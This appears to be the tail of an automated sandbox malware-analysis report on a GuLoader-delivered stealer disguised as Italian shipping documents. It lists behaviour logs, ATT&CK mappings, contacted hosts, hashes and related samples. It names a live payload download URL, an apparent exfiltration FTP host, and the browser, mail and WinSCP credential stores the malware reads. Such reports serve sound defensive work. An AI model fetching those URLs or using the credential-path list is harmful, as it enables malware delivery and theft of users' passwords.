            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            1
            Credentials in Registry
            126
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
            Process Injection
            1
            Software Packing
            Security Account Manager221
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets151
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518101 Sample: Documenti di spedizione 000... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 25 ftp.concaribe.com 2->25 27 concaribe.com 2->27 29 api.ipify.org 2->29 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 Yara detected GuLoader 2->49 51 5 other signatures 2->51 8 Documenti di spedizione 0009333000459595995.exe 1 23 2->8         started        signatures3 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 20 8->11         started        process6 file7 23 Documenti di spedi...333000459595995.exe, PE32 11->23 dropped 53 Writes to foreign memory regions 11->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 11->55 57 Powershell drops PE file 11->57 15 wabmig.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 31 concaribe.com 192.185.13.234, 21, 49739 UNIFIEDLAYER-AS-1US United States 15->31 33 185.29.11.53, 49737, 80 DATACLUB-NL European Union 15->33 35 api.ipify.org 104.26.13.205, 443, 49738 CLOUDFLARENETUS United States 15->35 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 Tries to harvest and steal ftp login credentials 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Documenti di spedizione 0009333000459595995.exe8%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe8%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://185.29.11.53/bIGuEflfnZjESw74.bin0%Avira URL Cloudsafe
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            https://aka.ms/pscore6lBfq0%Avira URL Cloudsafe
            http://185.29.11.53/bIGuEflfnZjESw74.binI0%Avira URL Cloudsafe
            https://api.ipify.org/t0%Avira URL Cloudsafe
            http://concaribe.com0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.13.205
            truefalse
              unknown
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  unknown
                  http://185.29.11.53/bIGuEflfnZjESw74.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://api.ipify.orgwabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore6lBfqpowershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://185.29.11.53/bIGuEflfnZjESw74.binIwabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ftp.concaribe.comwabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorDocumenti di spedizione 0009333000459595995.exe, Documenti di spedizione 0009333000459595995.exe.1.drfalse
                  • URL Reputation: safe
                  unknown
                  http://concaribe.comwabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ipify.org/twabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.29.11.53
                  unknownEuropean Union
                  203557DATACLUB-NLfalse
                  104.26.13.205
                  api.ipify.orgUnited States
                  13335CLOUDFLARENETUSfalse
                  192.185.13.234
                  concaribe.comUnited States
                  46606UNIFIEDLAYER-AS-1UStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518101
                  Start date and time:2024-09-25 12:07:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Documenti di spedizione 0009333000459595995.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@6/12@2/3
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 153
                  • Number of non-executed functions: 50
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Documenti di spedizione 0009333000459595995.exe
                  TimeTypeDescription
                  06:07:57API Interceptor34x Sleep call for process: powershell.exe modified
                  06:09:09API Interceptor27015x Sleep call for process: wabmig.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.26.13.205file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  api.ipify.orgrMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                  • 104.26.12.205
                  reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                  • 104.26.13.205
                  COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.12.205
                  http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 104.26.12.205
                  http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 104.26.13.205
                  http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 172.67.74.152
                  http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 172.67.74.152
                  http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.htmlGet hashmaliciousUnknownBrowse
                  • 104.26.12.205
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSJohn Lorenz-Employee-Benefits.docxGet hashmaliciousHTMLPhisherBrowse
                  • 188.114.97.3
                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                  • 188.114.97.9
                  Audio_Msg..00290663894983Transcript.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.143.206
                  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=emailGet hashmaliciousHTMLPhisherBrowse
                  • 104.19.148.54
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                  • 104.21.90.101
                  https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1Get hashmaliciousHTMLPhisherBrowse
                  • 104.18.95.41
                  rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  Setup_10024.exeGet hashmaliciousUnknownBrowse
                  • 172.67.69.201
                  DATACLUB-NLPO 00009876660887666000.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 84.38.133.121
                  Bankcopyscanneddoc.exeGet hashmaliciousRedLineBrowse
                  • 84.38.129.21
                  xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                  • 185.29.11.23
                  new.cmdGet hashmaliciousGuLoaderBrowse
                  • 185.29.11.28
                  temp.cmdGet hashmaliciousUnknownBrowse
                  • 185.29.11.28
                  price_request_.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.62
                  disprovable.dllGet hashmaliciousCryptOne, QbotBrowse
                  • 84.38.133.191
                  BL.xlsGet hashmaliciousLokibotBrowse
                  • 84.38.129.114
                  kej177el6.dllGet hashmaliciousQbotBrowse
                  • 84.38.133.191
                  e0CIQlOSBx.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 84.38.133.134
                  UNIFIEDLAYER-AS-1USAudio_Msg..00290663894983Transcript.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 162.215.211.9
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 162.241.27.20
                  Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                  • 162.214.80.31
                  https://wbh.sxx.temporary.site/Get hashmaliciousUnknownBrowse
                  • 50.6.160.227
                  https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/Get hashmaliciousUnknownBrowse
                  • 50.6.153.149
                  https://hr.schoolrundriver.com/system/fonts/wordpress/CHASEGet hashmaliciousUnknownBrowse
                  • 192.232.218.112
                  https://rb.gy/5ow3t3Get hashmaliciousUnknownBrowse
                  • 50.6.153.151
                  https://sjc.hgp.mybluehost.me/binance/bnb/access/account/login.php/Get hashmaliciousUnknownBrowse
                  • 50.6.153.107
                  http://www.icontci.com.br/ch/Swisscom/Swisscom/Swisscom-login/login/kunden/Get hashmaliciousUnknownBrowse
                  • 108.179.253.238
                  https://isz.npf.temporary.site/Get hashmaliciousUnknownBrowse
                  • 192.185.52.100
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0eCCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  CCE_000110.exeGet hashmaliciousUnknownBrowse
                  • 104.26.13.205
                  SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                  • 104.26.13.205
                  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=emailGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 104.26.13.205
                  https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1Get hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 104.26.13.205
                  rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  MailAttachment.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  Meeting-037-911.oneGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                        3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                          Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                rSCAN31804.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  rSCAN31804.exeGet hashmaliciousGuLoaderBrowse
                                    SCAN00381638.SCR.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
